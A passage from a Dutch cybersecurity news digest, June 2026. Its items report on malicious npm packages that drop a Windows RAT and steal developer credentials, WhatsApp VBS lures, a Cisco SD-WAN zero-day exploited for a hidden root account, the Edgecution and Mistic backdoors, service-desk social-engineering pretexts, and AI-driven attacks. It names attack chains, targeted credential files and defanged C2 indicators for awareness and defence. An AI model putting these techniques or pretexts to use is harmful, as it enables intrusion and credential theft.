2.  **Op deepfakes gebaseerde accountovernames**: Het gebruik van diepleertechnieken neemt toe. Tegen 2027 zullen kwaadwillenden hoogwaardige visuele en stem-deepfakes inzetten om klantenservice en beveiligingscontroles te omzeilen. Criminelen kunnen valse video's van legitieme klanten produceren, vals bewijs indienen en met succes fondsen van accounts met hoge waarde onttrekken.

3.  **Fraud-as-a-Service netwerken**: De groeiende markt voor cybercriminaliteit heeft de instapdrempel voor fraude verlaagd. Criminelen kunnen kant-en-klare diensten kopen, waaronder geautomatiseerde bots voor accountcreatie, gestolen identiteitspakketten, deepfake-generatiesoftware, proxy- en VPN-infrastructuur, en toolkits voor betalingsfraude. Dit model stelt zelfs onervaren actoren in staat om grootschalige, complexe aanvallen uit te voeren.

4.  **Geavanceerd bonusmisbruik**: Bonusmisbruik is al lang aanwezig in online casino's, maar de methoden zijn geëvolueerd. Machine learning technologie kan delinquenten helpen om fouten in promotiecampagnes te vinden, automatisch profielen aan te maken en duizenden door AI beheerde accounts te vormen. Detectie van dergelijke systemen vereist geavanceerde graafanalyse en intelligentie gebaseerd op apparaten.

Een belangrijke verschuiving voor security teams is de overgang van statische controles naar het analyseren van gedragspatronen. Waar vroeger de focus lag op vragen als "Is dit document echt?" of "Is de gebruiker eigenaar van deze betaalmethode?", moeten toekomstige fraudedetectiesystemen continu gebruikersgedrag controleren, zoals inlogpatronen, gokgewoonten, gebruikte apparaten, transacties en websitenavigatie. Zowel legitieme als frauduleuze gebruikers kunnen Know Your Customer-controles doorstaan, maar hun gedrag verschilt vaak significant. Het vermogen om deze kleine gedragsverschillen in realtime te spotten, wordt cruciaal. Organisaties investeren daarom steeds meer in door AI aangedreven monitoringoplossingen die risicosignalen continu analyseren.

 

Bron: sumsub.com

24 juni 2026 | Kwaadaardige npm-pakketten vermommen zich als PostCSS-tools om Windows RAT te leveren

Cybersecurityonderzoekers hebben een reeks kwaadaardige npm-pakketten ontdekt die zijn ontworpen om een remote access trojan (RAT) voor Windows te verspreiden. De geïdentificeerde pakketten, met de namen `aes-decode-runner-pro`, `postcss-minify-selector` en `postcss-minify-selector-parser`, zijn de afgelopen maand gepubliceerd door een npm-gebruiker genaamd "abdrizak" en zijn ten tijde van de publicatie nog steeds beschikbaar voor download.

JFrog, een van de onderzoeksgroepen, meldt in een analyse dat `aes-decode-runner-pro` en `postcss-minify-selector-parser` zich voordoen als gelaagde AES/custom-codec-pakketten en afhankelijk zijn van de legitieme `postcss-selector-parser`. Het pakket `postcss-minify-selector` presenteert zich als een PostCSS selector minifier en is afhankelijk van `postcss-minify-selector-parser`. De naam `postcss-minify-selector-parser` verwijst naar `postcss-selector-parser`, een veelgebruikte npm-bibliotheek met meer dan 127 miljoen wekelijkse downloads. Ongeacht welk pakket wordt gedownload, leidt de aanvalsketen tot de implementatie van dezelfde malware voor Windows.

De pakketten bevatten een JavaScript-dropper die een PowerShell-script met de naam "settings.ps1" naar de schijf schrijft en uitvoert. Dit PowerShell-script fungeert vervolgens als downloader voor een payload voor een volgende fase, die wordt opgehaald van een externe server ("nvidiadriver[.]net") met behulp van "curl.exe". De opgehaalde payload is een ZIP-archief, waaruit een Visual Basic Script-bestand ("update.vbs") wordt geëxtraheerd en uitgevoerd met "wscript.exe". In het gedownloade ZIP-bestand zijn ook een Python-runtime, een Python-loader ("loader.py") en een aantal Python-extensiemodules (*.pyd), gecompileerd met Nuitka, gebundeld.

Visual Basic is verantwoordelijk voor het opzetten van de Python-omgeving op de gecompromitteerde host en het starten van het "loader.py"-script, dat vervolgens de kernlogica van de malware activeert. De RAT is uitgerust om hostinformatie te verzamelen, credentials van Google Chrome af te tappen, gegevens van Chrome-extensies te verzamelen, shell-commando's uit te voeren en bestanden te downloaden en uploaden van en naar een command-and-control (C2)-server ("95.216.92[.]207:8080"). Deze functionaliteiten worden gerealiseerd via een reeks native Python-extensiemodules: `config.pyd` (bevat constanten, commando-ID's, C2 URL, namen van registersleutels), `api.pyd` (verwerkt HTTP C2-pakketuitwisseling), `audiodriver.pyd` (verwerkt de hoofd-RAT-orchestratie-loop), `command.pyd` (profileert de host, voert controles op virtuele machines (VM) uit, bestandsoverdracht en shell-uitvoering), `auto.pyd` (voert diefstal van Chrome-credentials en -extensies uit, waarbij app-gebonden encryptiebeschermingen (ABE) worden omzeild), en `util.pyd` (fungeert als helpers voor tar/gzip-archieven).

JFrog benadrukt dat deze zaak aantoont hoe een klein, parserachtig pakket een Windows-payload in meerdere fasen kan verbergen, terwijl het zich voordoet als gerelateerd aan legitieme build-tools met massaal wekelijks gebruik. Voor verdedigers is de belangrijke les om afhankelijkheden die lijken op legitieme build-tools te behandelen als potentiële leveringsmechanismen, en niet alleen als onschuldige naamsverwarring.

De ontdekking valt samen met drie andere campagnes die gericht zijn op het npm- en TypeScript-ecosysteem. Een kwaadaardig pakket genaamd "apintergrationpost" levert een volwaardige Linux RAT genaamd MYRA, terwijl het beweert een Node.js-integratieclient te zijn voor geautoriseerde red team-oefeningen. Dit pakket compileert een native C-rootkit tijdens de installatie, creëert drie onafhankelijke persistentie-mechanismen, vermomt zich als een systemd-service, ondersteunt bestandsloze uitvoering en biedt interactieve shell-toegang met live schermstreaming, aldus SafeDep.

Een ander kwaadaardig pakket, "@withgoogle/stitch-sdk", imiteert Google's Stitch AI-ontwerptool, maar beschikt over de mogelijkheid om credentials van ontwikkelaars te stelen uit acht bronnen (Claude Code, git config, ~/.git-credentials, SSH-publieke sleutels, GitHub CLI, npm config, ~/.npmrc en ~/.docker/config.json) en deze te exfiltreren naar een door aanvallers beheerd domein ("stitch-production[.]org/api/v1"). Verder is een cluster van vijf pakketten (`procwire`, `routecraft`, `endpointmap`, `bytecraft` en `staticlayer`) waargenomen, dat een dropper-binary op Windows-hosts levert vanaf een externe server en deze uitvoert tijdens de npm-installatie.

De bevindingen vallen ook samen met een supply chain aanval gericht op de "gonex-AI/Understand-Anything" kennisgraaf-tool om een kwaadaardige payload te pushen die communiceert met een van de drie hardcoded C2-servers, een campagnemarker exfiltreert, een gedownloade botclient XOR-decodeert en evalueert, en vervolgens onafhankelijk een commando voor de tweede fase oplost van een Tron blockchain-adres waarvan de nieuwste transactie een BSC-transactie-hash bevat die de actieve payload draagt. Deze activiteit overlapt met een Noord-Koreaanse supply chain-operatie genaamd PolinRider, die is waargenomen bij het injecteren van obfusceerde JavaScript in configuratiebestanden van legitieme ontwikkelaars in bijna 2.000 gecompromitteerde GitHub-repositories om een bekende malware-downloader en -stealer, genaamd BeaverTail, te leveren, die vervolgens de weg vrijmaakt voor de InvisibleFerret-backdoor. SafeDep merkt op dat deze aanval drie elementen combineert die individueel bekend zijn, maar samen een detectiegat creëren: een uitgebreide valse PR-beschrijving met vervalst testbewijs, een diff die de payload verbergt in horizontale witruimte, en een C2 in twee fasen waarbij de tweede fase publieke blockchain-infrastructuur gebruikt als een write-once, read-anywhere relay.

Gebruikers die een van de bovengenoemde pakketten hebben geïnstalleerd, wordt geadviseerd deze onmiddellijk te verwijderen, alle door hen gemaakte artefacten te verwijderen en credentials van getroffen ontwikkelmachines te roteren.

 

Bron: JFrog | Bron 2: github.com | Bron 3: opensourcemalware.com

24 juni 2026 | WhatsApp-gebruikers doelwit van aanvallen met kwaadaardige VBS-bestanden

Antivirusbedrijf Kaspersky heeft een analyse gepubliceerd waaruit blijkt dat gebruikers van WhatsApp Web en Desktop op Windows momenteel doelwit zijn van gerichte cyberaanvallen. Bij deze aanvallen proberen cybercriminelen via kwaadaardige VBS-bestanden (Visual Basic Script) remote beheersoftware op de systemen van slachtoffers te installeren.

De aanval begint wanneer cybercriminelen toegang krijgen tot een WhatsApp-account. Vanuit dit gecompromitteerde account versturen zij vervolgens documenten naar de contacten van het slachtoffer. Deze documenten doen zich voor als legitieme zakelijke of financiële bestanden, maar zijn in werkelijkheid de eerdergenoemde kwaadaardige VBS-bestanden.

Om geïnfecteerd te raken, moet de gebruiker actief op de verstuurde bijlage klikken. Voor gebruikers van WhatsApp Desktop kan de bijlage direct vanuit de applicatie worden geopend. Gebruikers van WhatsApp Web moeten het bestand eerst downloaden en vervolgens handmatig openen vanuit hun downloadmap.

Eenmaal geopend, downloadt het VBS-bestand de software ManageEngine Endpoint Central op het systeem. Kaspersky benadrukt dat ManageEngine Endpoint Central op zichzelf legitieme remote management software is, die normaal gesproken wordt gebruikt voor het uitrollen van software, systeembeheer en remote support binnen organisaties. In dit geval misbruiken de aanvallers deze software echter om volledige toegang tot het gecompromitteerde systeem te verkrijgen.

Nadat een systeem succesvol is geïnfecteerd, gebruiken de aanvallers het nieuwe slachtoffer om op hun beurt weer malafide bestanden naar diens contacten te versturen, waardoor de aanval zich verder verspreidt.

De meeste infecties zijn door Kaspersky waargenomen in Maleisië. Ook werden infecties gedetecteerd in Brazilië, India, Mexico, Singapore, het Verenigd Koninkrijk, Spanje, Taiwan, Australië, Rusland en Vietnam.

 

Bron: Kaspersky | Bron 2: manageengine.com

25 juni 2026 | Cisco Catalyst SD-WAN Zero-Day misbruikt voor root-toegang

Een onbekende dreigingsactor heeft een recentelijk openbaar gemaakte, ernstige beveiligingsfout in software van Cisco Catalyst SD-WAN misbruikt als een zero-day kwetsbaarheid. Dit gebeurde minstens twee maanden voordat de kwetsbaarheid publiekelijk bekend werd gemaakt, zo blijkt uit nieuwe bevindingen van Mandiant, eigendom van Google.

De kwetsbaarheid, getraceerd als CVE-2026-20245 met een CVSS-score van 7.8, stelt een geauthenticeerde, lokale aanvaller in staat om willekeurige commando's met verhoogde privileges uit te voeren. Dit gebeurt door een speciaal geprepareerd bestand aan het getroffen systeem te leveren, waarbij misbruik wordt gemaakt van onvoldoende validatie van gebruikersinvoer op het apparaat. Eerder deze maand erkende Cisco dat het op de hoogte was van de exploitatie van deze kwetsbaarheid en voegde eraan toe dat een kwaadwillende actor netadmin-privileges op een getroffen systeem moest hebben om een succesvolle aanval uit te voeren.

Onderzoekers van Mandiant, Chester Sng, Pete Boonyakarn en Logeswaran Nadarajan, verklaarden dat de dreigingsactor gedurende de hele inbraak consistent anti-forensische technieken toepaste. Dit omvatte het selectief verwijderen en herstellen van systeemconfiguratiebestanden die tijdens hun activiteiten waren gewijzigd, om operationele beveiliging te handhaven en detectie te voorkomen. Het incident, zo voegde de incidentrespons- en dreigingsinformatieafdeling van de techgigant eraan toe, was gericht op een niet-gespecificeerde communicatiedienstverlener om een gecompromitteerd admin-account te verheffen tot volledige root-toegang.

Twee verschillende periodes van ongeoorloofde activiteit zijn gedetecteerd: één tussen eind 2025 en januari 2026, en de andere in maart 2026. Op dit moment is het onduidelijk of deze twee gebeurtenissen met elkaar in verband staan en het werk zijn van dezelfde dreigingsactor. Tijdens de eerste golf zou het slachtoffer ongeautoriseerde peering-verbindingen hebben ervaren, die waarschijnlijk misbruik maakten van een van de twee authenticatie-bypass kwetsbaarheden in Cisco Catalyst SD-WAN controllers (CVE-2026-20127 of CVE-2026-20182). Beide beveiligingskwetsbaarheden waren op dat moment nog onbekende zero-days.

Vervolgens, in maart 2026, richtte een tweede golf van kwaadaardige peering-verbindingen zich op een apparaat met een nieuwere softwareversie die gepatcht was tegen CVE-2026-20127. Cisco heeft sindsdien bevestigd dat deze verbindingen geen misbruik maakten van CVE-2026-20182, wat de mogelijkheid vergroot dat de aanvaller, die al dan niet achter de eerdere ongeautoriseerde peering-verbindingen zat, vertrouwde op gestolen certificaten van een eerdere inbraak op hetzelfde apparaat om initiële toegang te verkrijgen.

Mandiant meldde dat de aanvaller vervolgens de standaard admin-gegevens wijzigde voordat CVE-2026-20245 als een zero-day werd misbruikt via een kwaadaardige CSV-bestandsupload (evil_tenant.csv). Deze exploitatie stelde hen in staat om privileges te escaleren en een kwaadaardig gebruikersaccount (genaamd 'troot') aan te maken met volledige shell-controle op root-niveau.

De aanvallers hebben ook consequent hun sporen gewist door door hen gemaakte bestanden te verwijderen, configuratiewijzigingen ongedaan te maken en scripts uit te voeren om ervoor te zorgen dat er geen bewijs achterbleef en het vermogen van verdedigers om de volledige omvang van de compromittering te beoordelen, te beperken. Austin Larsen, principal threat analyst bij Google Threat Intelligence Group (GTIG), legde uit dat de actor, na het wijzigen van het standaard admin-wachtwoord en het exfiltreren van de SD-WAN fabric configuratie, het wachtwoord terugzette naar de oorspronkelijke waarde, zodat een beheerder bij het inloggen niets ongewoons zou merken. Ze escaleerden naar root via een kwaadaardige CSV-upload, creëerden een verborgen "troot"-account in /etc/passwd en /etc/shadow, en verwijderden vervolgens elk bestand dat ze aanraakten en voerden een validatiescript uit om te bevestigen dat hun indicatoren verdwenen waren.

Google wees erop dat deze activiteit opnieuw de "voortdurende trend" benadrukt van kwaadwillende actoren die zero-days in edge-apparaten, zoals SD-WAN, bewapenen. Deze apparaten missen de telemetrie die nodig is voor diepgaande forensische analyse, en een voet aan de grond in dergelijke systemen kan aanhoudende zichtbaarheid in intern verkeer over de hele fabric vergemakkelijken. Charles Carmakal, chief technology officer van Mandiant Consulting, merkte op dat geavanceerde tegenstanders zich blijven richten op netwerkapparaten en andere systemen die geen native EDR-oplossingen ondersteunen.

 

Bron: Mandiant

25 juni 2026 | Malafide Edge-extensie omzeilt browserbeveiliging voor ransomware

Een kwaadaardige Microsoft Edge-extensie, genaamd 'Edgecution', wordt ingezet bij ransomware aanvallen om de browser-sandbox te ontsnappen en een op Python gebaseerde backdoor te implementeren. De aanvallers verkrijgen toegang tot het lokale systeem door misbruik te maken van het Chrome Native Messaging-protocol. Dit protocol stelt browserextensies in staat om te communiceren met native desktopapplicaties, zoals een wachtwoordmanager die met een extensie communiceert om webformulieren in te vullen. Hierdoor kan de browser de native applicatie als een afzonderlijk proces starten en ermee communiceren via standaard input/output datastromen.

Een compromittering door Edgecution begint wanneer de aanvaller zich voordoet als IT-ondersteunend personeel op Microsoft Teams. Zij leiden medewerkers naar een frauduleuze webpagina onder het voorwendsel van het installeren van een spamfilter-update. Onderzoekers van cloudbeveiligingsbedrijf Zscaler vermoeden dat Edgecution wordt ingezet door een initial access broker (IAB) die verbonden is met de Payouts Kings ransomware-operatie. Bij recente aanvallen met tactieken die eerder werden geassocieerd met deze IAB, stuurde de dreigingsactor slachtoffers naar een nep-Microsoft "Outlook Updates Management Console", die downloadknoppen presenteerde voor updatepakketten of softwareverificatie. Deze knoppen downloadden echter kwaadaardige componenten, kopieerden scripts naar het klembord, of lanceerden formulieren die vroegen om Microsoft 365- en Outlook-wachtwoorden.

Volgens Zscaler bieden deze knoppen de dreigingsactor drie verschillende opties, via een AutoHotKey-script, een Windows batch-script en een PowerShell-script, om de malware voor Edgecution te implementeren. Wanneer het AutoHotKey-script of de inhoud van het klembord wordt uitgevoerd, configureren de commando's de omgeving, herstellen ze de headers van een versleuteld ZIP-bestand, extraheren ze relevante bestanden en creëren ze een geplande taak die Microsoft Edge uitvoert.

De malware-componenten worden van de nep-Microsoft update-site opgehaald in een ZIP-archief met misvormde headers, om te voorkomen dat beveiligingsproducten het herkennen als een geldig archief. Het ZIP-bestand bevat een ingebedde Python-versie 3.13.3 en twee mappen, genaamd 'extension' en 'native', wat een hint geeft over de gebruikte techniek. De eerste malware-component is de kwaadaardige Microsoft Edge-extensie, vermomd als een 'Edge Monitoring Agent'. Deze maakt verbinding met het command-and-control (C2) eindpunt van de aanvaller, ontvangt instructies voor uitvoering en stuurt de resultaten terug naar de operator. De malware voor Edgecution draait in een headless Edge-browser, waardoor deze onzichtbaar is voor de gebruiker, en gebruikt het Chrome Native Messaging-protocol om te communiceren met een lokale applicatie.

De extensie is beperkt tot de sandbox van de browser, maar de aanvaller omzeilt deze beperking via een tweede malware-component, een op Python gebaseerde backdoor die fungeert als de host-level uitvoerder. Deze component ontvangt commando's die worden doorgestuurd vanuit de kwaadaardige extensie en kan potentieel de volgende taken uitvoeren: shell-commando's uitvoeren, PowerShell draaien, willekeurige Python-code uitvoeren, bestanden schrijven op de host en systeem informatie verzamelen. De scripts zorgen ervoor dat de extensie de Python-backdoor kan starten door in de 'native' map een batch-bestand aan te maken dat de extensie kan aanroepen. Bovendien creëren ze het vereiste Chrome native messaging-manifest dat beschrijft hoe de browser verbinding kan maken met de native app.

Zscaler's technische analyse merkt op dat beide malware-componenten ongebruikte commando's bevatten die in toekomstige versies kunnen worden geactiveerd. De onderzoekers waarschuwen dat de methode die door Edgecution wordt gebruikt, de toenemende verfijning van dreigingsactoren die verbonden zijn met ransomware-operaties illustreert, en hen in staat stelt persistentie te vestigen op gecompromitteerde hosts. Zij adviseren organisaties om de monitoring van browserextensies te versterken en strikte controles af te dwingen over de configuraties van native messaging hosts om het risico op compromittering te verminderen. Het rapport van Zscaler biedt een lijst met indicators of compromise (IoC's), waaronder command-and-control servers gebruikt door Edgecution, hashes voor de kwaadaardige extensie en de Python-backdoor.

 

Bron: Zscaler | Bron 2: hubs.li

25 juni 2026 | Nieuwe Mistic backdoor omzeilt detectie met Microsoft security tooling

Een geavanceerde en moeilijk detecteerbare backdoor, genaamd Mistic, heeft sinds april 2026 onopgemerkt bedrijfsnetwerken geïnfiltreerd. Deze malware camoufleert zich door de namen en het uiterlijk van legitieme componenten van Microsoft endpoint security te imiteren, waardoor het detectie kan omzeilen en aanvallers een aanhoudende, onopvallende aanwezigheid binnen gecompromitteerde omgevingen kunnen handhaven. Beveiligingsteams in diverse sectoren zijn alert, aangezien er steeds meer incidenten aan het licht komen.

Mistic heeft organisaties getroffen in de verzekerings-, onderwijs-, informatietechnologie- en professionele dienstensector. De aanvallen zijn opportunistisch van aard; de groep verspreidt een breed net en beoordeelt vervolgens welke gecompromitteerde netwerken waardevol genoeg zijn om de toegang tot te verkopen. Deze toegang wordt vervolgens aangeboden aan ransomware-affiliates en andere criminele groepen, die betalen voor een kant-en-klaar toegangspunt tot bedrijfssystemen.

Analisten van Symantec hebben de dreiging geïdentificeerd en gekoppeld aan een financieel gemotiveerde cybercriminele groep die bekendstaat als Woodgnat, ook wel KongTuke genoemd. Volgens een rapport van Symantec werd Mistic ingezet naast ModeloRAT, een remote access tool die in verband wordt gebracht met aanvallen waarbij ransomwaregroepen zoals Qilin, Akira, Rhysida, Black Basta, Interlock en 8Base betrokken waren.

Mistic werd voor het eerst publiekelijk gedocumenteerd door Zscaler, dat de backdoor volgt onder de naam MLTBackdoor. Het onderzoek van Symantec ging dieper en koppelde de backdoor steviger aan de groeiende toolkit van Woodgnat, waardoor de rol ervan in een bredere criminele toeleveringsketen werd bevestigd. Het primaire doel van de groep is niet het lanceren van de uiteindelijke aanval, maar het verkopen van waardevolle toegang aan derden.

Wat Mistic bijzonder gevaarlijk maakt, is de effectiviteit waarmee het zich verbergt. De backdoor draait volledig in het geheugen zonder bestanden naar de schijf te schrijven en beschikt over een ingebouwde kill switch waarmee het zichzelf kan wissen wanneer het niet langer nodig is. Deze eigenschappen maken detectie uiterst moeilijk en stellen aanvallers in staat om gedurende langere perioden ongemerkt binnen een netwerk te opereren.

Mistic bereikt zijn doelwit via een techniek die bekendstaat als DLL sideloading, waarbij een legitiem uitvoerbaar bestand wordt gemanipuleerd om een kwaadaardig bestand te laden. Bij de onderzochte aanvallen werd een legitiem Microsoft-bestand genaamd MpExtMs.exe gebruikt om een kwaadaardige DLL met de naam EndpointDlp.dll te sideloaden. Deze naam is direct geassocieerd met tooling van Microsoft endpoint security en helpt de backdoor zich voor te doen als vertrouwde software die op de achtergrond draait. Een loader genaamd version.dll fungeert als tussenpersoon in dit proces. Het haakt twee Windows-functies, GetModuleFileNameW en LoadLibraryW, om de uitvoering naar de kwaadaardige DLL te leiden, terwijl de normale werking intact blijft. Daarnaast werd een afzonderlijke .NET DLL ingezet als credential stealer, die een vals inlogscherm weergaf om wachtwoorden van nietsvermoedende slachtoffers te oogsten.

Naast zijn vermogen om zich te verbergen, is Mistic zeer capabel. Het kan bestanden uploaden en downloaden, gegevens verplaatsen of verwijderen, mappen aanmaken, externe code in het geheugen uitvoeren en de frequentie van de communicatie met de command-and-control server van de aanvaller aanpassen. Dit geeft operators een sterke controle over elk netwerk dat zij weten te infiltreren.

Woodgnat is sinds minstens mei 2024 actief en heeft zijn aanvalsmethoden voortdurend verfijnd. De groep compromitteert WordPress-sites en injecteert JavaScript om bezoekers te profileren voordat social engineering-lures worden ingezet die gebruikers misleiden om kwaadaardige commando's uit te voeren. Deze lures zijn geëvolueerd via ClickFix- en FileFix-tactieken naar een recentere aanpak genaamd CrashFix, die de browser van een slachtoffer laat crashen en een valse oplossing presenteert die malware installeert.

Sinds april 2026 maakt Woodgnat ook gebruik van valse scenario's van IT-helpdesks via Microsoft Teams-chats om gebruikers aan te zetten tot het uitvoeren van PowerShell-commando's. Eenmaal uitgevoerd, downloadt een scriptketen een draagbare Python-omgeving en start ModeloRAT, waarna aanvallers diepgaande verkenning uitvoeren, referenties oogsten en meerdere persistentiepaden opzetten. Deze gelaagde aanpak maakt de groep moeilijk volledig te verwijderen, zelfs na de eerste ontdekking.

Beveiligingsonderzoekers raden aan om ongebruikelijke DLL sideloading-activiteit te monitoren, vooral wanneer legitieme Microsoft-uitvoerbare bestanden onverwachte bestanden laden. Organisaties moeten ook alert zijn op verdacht gebruik van ingebouwde Windows tools zoals curl.exe, certutil, WMIC en PowerShell in contexten buiten normale operaties. Het afstemmen van endpoint detectie op in-memory uitvoering en het volgen van abnormaal netwerkgedrag behoren tot de meest praktische verdedigingsmaatregelen tegen deze dreiging.

 

Bron: Symantec | Bron 2: security.com

25 juni 2026 | Social engineering via servicedesks blijft succesvolle aanvalsmethode

Social engineering via de servicedesk behoort nog steeds tot de meest effectieve methoden voor aanvallers om toegang te verkrijgen tot bedrijfssystemen. Recente incidenten, zoals de aanvallen in 2025 op Britse retailers Marks & Spencer (M&S), Co-op en Harrods door het hackcollectief Scattered Spider, hebben deze tactieken opnieuw onder de aandacht gebracht. Deze incidenten staan echter niet op zichzelf. In het geval van M&S bevestigde voorzitter Archie Norman dat aanvallers zich voordeden als werknemer en een externe servicedeskmedewerker overtuigden om inloggegevens opnieuw in te stellen, wat leidde tot toegang tot interne systemen.

Meer recentelijk maakte Carnival Corporation een cyberbeveiligingsincident bekend waarbij een aanvaller social engineering gebruikte om een werknemer te misleiden en toegang te krijgen tot een beperkt deel van de IT omgeving van het bedrijf. Rond dezelfde periode waarschuwde de FBI organisaties voor activiteiten die verband houden met de dreigingsactor Silent Ransom Group. Leden van deze groep zouden zich voordoen als personeel voor IT-ondersteuning en werknemers overhalen om deel te nemen aan externe toegangssessies met behulp van legitieme tools voor beheer. Ondanks strengere regelgeving, toegenomen bewustzijn en een aantal spraakmakende arrestaties, is de interesse van aanvallers in deze methode om bedrijfsomgevingen binnen te dringen nauwelijks afgenomen. Het aanhoudende succes van deze aanvallen benadrukt een eenvoudige realiteit: het compromitteren van een servicedesk is vaak eenvoudiger dan het omzeilen van de technologie die deze beschermt.

Aanvallers zoals Scattered Spider richten zich op servicedesks omdat deze een ingang met hoge hefboomwerking en lage weerstand tot bedrijfsnetwerken bieden. Dit komt door verschillende factoren: menselijke kwetsbaarheid, toegang tot inloggegevens en resets, het omzeilen van technische verdedigingsmechanismen, en de snelheid en heimelijkheid van de aanvallen. Servicedeskmedewerkers zijn primair getraind om te helpen, zelfs als ze enige training hebben gehad met betrekking tot aanvallen via social engineering. Dit maakt hen vatbaar voor imitatiepogingen, vooral wanneer aanvallers vloeiend, urgent en deskundig klinken. Bovendien hebben servicedeskmedewerkers doorgaans de mogelijkheid om wachtwoorden opnieuw in te stellen, accounts aan te maken of multi-factor authenticatie (MFA) uit te schakelen, wat aanvallers een directe weg naar legitieme toegang geeft. In plaats van firewalls te doorbreken of ongedetecteerde software te exploiteren, stelt social engineering aanvallers in staat om via vertrouwen en manipulatie binnen te komen. Een goed opgesteld telefoongesprek of chat kan binnen enkele minuten toegang opleveren, vaak zonder beveiligingswaarschuwingen te activeren, vooral wanneer aanvallers interne processen nabootsen of interne nummers spoofen. Dit maakt helpdesks tot een zacht maar cruciaal doelwit voor escalatie van privileges en om als insider op te gaan.

Een onderzoek van Verizon, het Data Breach Investigation Report, toonde aan dat gestolen inloggegevens betrokken zijn bij 44,7% van alle datalekken. De typische aanval via de servicedesk verloopt in drie fasen. Ten eerste de verkenning en voorbereiding, waarbij aanvallers grote bedrijven met gedecentraliseerde of uitbestede IT-ondersteuning identificeren. Ze verzamelen informatie via LinkedIn, bedrijfsstructuren of datalekken om namen van werknemers, rollen en ticketsystemen zoals ServiceNow te achterhalen. Vervolgens zetten ze VoIP-diensten op om interne telefoonnummers na te bootsen, of gebruiken ze soms telefoons met SIM-swapping of spoofing van e-mail.

De tweede fase is imitatie en social engineering. Aanvallers bellen of chatten met de servicedesk en doen zich voor als een echte werknemer of aannemer die dringend hulp nodig heeft. Veelvoorkomende voorwendsels zijn: "Ik ben buitengesloten van mijn account voor een kritieke vergadering," "Mijn telefoon is verloren; ik moet mijn MFA resetten om toegang te krijgen tot salarisadministratie/e-mail," of "We hebben een incident en ik heb referenties van beheerders nodig om het op te lossen." De toon is vaak vriendelijk, gehaast of licht gestrest om de supportmedewerker onder druk te zetten. Ze gebruiken interne jargon of verwijzingen en vermelden actuele lokale gebeurtenissen om een band op te bouwen en argwaan te verminderen.

De derde en laatste fase is het resetten van inloggegevens en het omzeilen van MFA. Het doel is om de helpdesk te verleiden tot het opnieuw instellen van het wachtwoord van een echt gebruikersaccount, het verwijderen of opnieuw registreren van multi-factor authenticatie, of het aanmaken van een nieuw account met geprivilegieerde toegang. Tactieken omvatten onder meer het spoofen van beller-ID.

 

Bron: FBI | Bron 2: specopssoft.com | Bron 3: prnewswire.com

25 juni 2026 | Opkomst van 'Apex Agentic Adversary': AI versnelt cyberaanvallen

De cybersecuritywereld staat aan de vooravond van een fundamentele verandering door de opkomst van "agentic" AI modellen, die de snelheid en anonimiteit van cyberdreigingen drastisch zullen verhogen. Waar organisaties voorheen weken of maanden hadden om te reageren op kwetsbaarheden en patches te implementeren, zal de nieuwe generatie AI-gestuurde aanvallen dit tijdsbestek tot seconden comprimeren.

Vanaf begin 2026 zijn er geavanceerde AI-entiteiten verschenen die niet langer alleen code suggereren, maar deze actief testen. Deze modellen versnellen niet alleen de aanvalscyclus, maar verkorten ook radicaal de tijd tussen de ontdekking van een kwetsbaarheid en de daadwerkelijke wapening ervan. Dezelfde AI-technologie die ontwikkelaars in staat stelt code in seconden te refactoren, geeft aanvallende AI modellen de kracht om logische fouten met dezelfde snelheid op te sporen. Deze tools kunnen een kwetsbaarheid vinden, deze wapenen en een inbraak uitvoeren voordat een menselijke verdediger zelfs zijn koffie op heeft. De operationele wendbaarheid die onze workflows heeft gemoderniseerd, is nu dezelfde wendbaarheid die een tegenstander tegen ons kan keren.

Een van de meest verontrustende aspecten van deze ontwikkeling is de toenemende anonimiteit. In het pre-AI-tijdperk vertrouwden verdedigers op openbare catalogi van exploits, zoals CISA's KEV Catalog, en zochten ze naar bekende handtekeningen en gedocumenteerd gedrag. Echter, omdat door AI aangedreven inbraken autonoom en zelfgenererend worden, zullen ze vluchtig zijn. Aanvallen zullen zo snel, zo gericht en zo gemuteerd zijn dat ze niet lang genoeg detecteerbaar blijven om te worden gecatalogiseerd. Tegen de tijd dat een SIEM-systeem een waarschuwing genereert, kan de AI-agent al hebben gepivoteerd, gegevens hebben geëxfiltreerd en mogelijk geen spoor hebben achtergelaten.

Het risico wordt verder vergroot door de convergente wereld waarin IT- en OT-systemen samenkomen. De traditionele illusie van segmentatie, waarbij kritieke industriële assets als air-gapped of veilig achter firewalls werden beschouwd, is nu een ontwerpfout. Een AI-agent ziet geen firewall; het ziet een exploiteerbare asset. Laterale beweging wordt een geautomatiseerde reflex. De AI kan bijvoorbeeld de laptop van een technicus identificeren die de bedrijfs-Wi-Fi verbindt met het fabrieks-LAN en deze kloof in milliseconden overbruggen. Onveilig-door-ontwerp industriële protocollen zoals Modbus, BACnet en S7comm worden als open snelwegen behandeld. Wanneer een inbraak die zijn oorsprong vindt in IT, met machinesnelheid overgaat naar de OT-omgeving, is het niet langer alleen een datalek, maar kan het leiden tot de stilstand van een fabrieksvloer of het openen van een veiligheidsklep.

Om te overleven, moeten defensieve strategieën verschuiven van reactief naar proactieve verharding van de omgeving. runZero heeft nieuwe mogelijkheden ontwikkeld om de tegenstander de schaduwen te ontzeggen die zij nodig hebben om te opereren. Dit omvat het in kaart brengen van voorheen onzichtbare activa door achter protocolgateways te kijken, het identificeren van onbeheerde apparaten zoals malafide toegangspunten en schaduw-IT zonder agents of referenties, en het valideren van netwerksegmentatie via interactieve aanvalspadmapping. Door risico's te prioriteren en knelpunten te identificeren waar kwetsbaarheden samenkomen met aanvalspaden, kunnen organisaties hun verdediging preciezer versterken.

 

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

25 juni 2026 | RDI waarschuwt voor toekomstige dreiging quantumcomputers

De Rijksinspectie Digitale Infrastructuur (RDI) heeft organisaties in Nederland gewezen op de toekomstige dreiging die uitgaat van quantumcomputers. Hoewel deze dreiging momenteel niet acuut is, benadrukt de toezichthouder dat de voorbereiding op een quantumveilige toekomst jaren in beslag zal nemen. Een van de voornaamste risico’s is de capaciteit van quantumcomputers om bestaande encryptiemethoden relatief eenvoudig te kraken.

De RDI licht toe dat quantumcomputers functioneren op basis van de principes van de quantummechanica. Dit stelt hen in staat om meerdere mogelijkheden simultaan te verkennen en de meest geschikte uitkomst te filteren, wat resulteert in een exponentieel snellere uitvoering van bepaalde berekeningen vergeleken met conventionele computers. De inspectie erkent dat volwaardige quantumcomputers nog niet operationeel zijn, maar verwacht wel dat deze in de toekomst zullen verschijnen. De transitie naar beveiligingsmaatregelen die bestand zijn tegen deze nieuwe technologie, oftewel 'quantumveilige beveiliging', is echter een langdurig proces dat jaren van voorbereiding vereist.

